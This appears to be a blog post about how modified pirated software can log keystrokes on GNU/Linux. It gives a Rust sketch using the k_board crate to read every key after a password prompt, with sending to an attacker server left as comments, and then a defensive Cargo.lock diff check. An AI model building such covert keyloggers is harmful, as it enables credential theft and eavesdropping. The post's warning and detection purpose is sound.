Cybercriminals often don't obtain our passwords or tokens through brute-force decryption; they simply listen to our keyboard...
In this article, I'll show you how pirated software can steal your passwords on GNU/Linux systems with just 10 additional lines of code.
Let's take a look at this Rust code:
```rust
use std::io::BufRead;

fn main() {
    println!("Enter your token to validate your identity:");
    let mut password: String = String::new();
    // we could hide the input for more privacy
    let stdin: std::io::Stdin = std::io::stdin();
    stdin.lock().read_line(&mut password).unwrap();
    // send password with HTTPS
}
```
It is a standard function that retrieves a password and then sends it via HTTPS to a server. Without any alteration, this code is 100% secure.
Now, let's assume the user didn't download or compile an authentic version but instead downloaded a version modified by a cybercriminal. We can observe that by using a low-level keyboard handler, not only can they obtain the user's password, but they can also eavesdrop on the entire session.
I will use k_board for this.
```shell
cargo add k_board
```
Objectives:
- Obtain password: Listen to the keyboard until an Enter key is pressed.
- Session: Send what is typed to an HTTP server every 10 keystrokes.
```rust
use k_board::{Keyboard, Keys};
use std::io::BufRead;

fn main() {
    println!("Enter your token to validate your identity:");
    let mut password: String = String::new();
    let stdin: std::io::Stdin = std::io::stdin();
    stdin.lock().read_line(&mut password).unwrap();
    // -> send password to the original server
    // -> send password to our server
    // -> Inside logic program: look to every key event
    get_keys_pressed_and_send_it();
}

fn get_keys_pressed_and_send_it() {
    let mut i: u8 = 0;
    loop {
        let key = Keyboard::new().read_key();
        if key != Keys::Null {
            i += 1;
        }
        if i == 10 {
            // send to our server
            i = 0;
        }
    }
}
```
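A defender-side check for the scenario above, as an added example that is not part of the original article: when you build from source, compare the `Cargo.lock` of the copy you obtained against one you already reviewed and flag every crate that was added, such as `k_board` here. The crate name `token_client`, the version numbers and both lockfile samples are constructed for illustration.

```rust
use std::collections::BTreeSet;

// Constructed sample: lockfile of the build you reviewed (crate name is hypothetical).
const REVIEWED_LOCK: &str = "[[package]]\nname = \"token_client\"\nversion = \"0.1.0\"\n";

// Constructed sample: lockfile that came with the copy you are about to build.
const CANDIDATE_LOCK: &str = r#"
version = 3
[[package]]
name = "k_board"
version = "1.0.0"
[[package]]
name = "token_client"
version = "0.1.0"
dependencies = ["k_board"]
"#;

/// Collect (name, version) for every `[[package]]` table in a Cargo.lock.
fn locked_packages(lock: &str) -> BTreeSet<(String, String)> {
    let mut pkgs = BTreeSet::new();
    let mut name: Option<String> = None;
    for line in lock.lines().map(str::trim) {
        if line == "[[package]]" {
            name = None; // a new package table starts here
        } else if let Some(v) = line.strip_prefix("name = ") {
            name = Some(v.trim_matches('"').to_string());
        } else if let Some(v) = line.strip_prefix("version = ") {
            // The file-level `version = 3` has no package name before it and is skipped.
            if let Some(n) = name.take() {
                pkgs.insert((n, v.trim_matches('"').to_string()));
            }
        }
    }
    pkgs
}

/// Packages (or versions) present in the candidate but absent from the reviewed lockfile.
fn unexpected_packages(reviewed: &str, candidate: &str) -> Vec<(String, String)> {
    let known = locked_packages(reviewed);
    locked_packages(candidate).into_iter().filter(|p| !known.contains(p)).collect()
}

fn main() {
    for (name, version) in unexpected_packages(REVIEWED_LOCK, CANDIDATE_LOCK) {
        println!("unreviewed dependency: {} {}", name, version);
    }
}
```

This only helps when you build from source; for a prebuilt binary, verify the publisher's checksum or signature instead.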
I am a little scared of what cybercriminals can do to me if I use modified software. Advocating for free software is not just about having things "free" in the economic sense of the word; it is also about preventing these kinds of everyday threats.
See you in the next article!!
Top comments (1)
This is what I was looking for. Thank you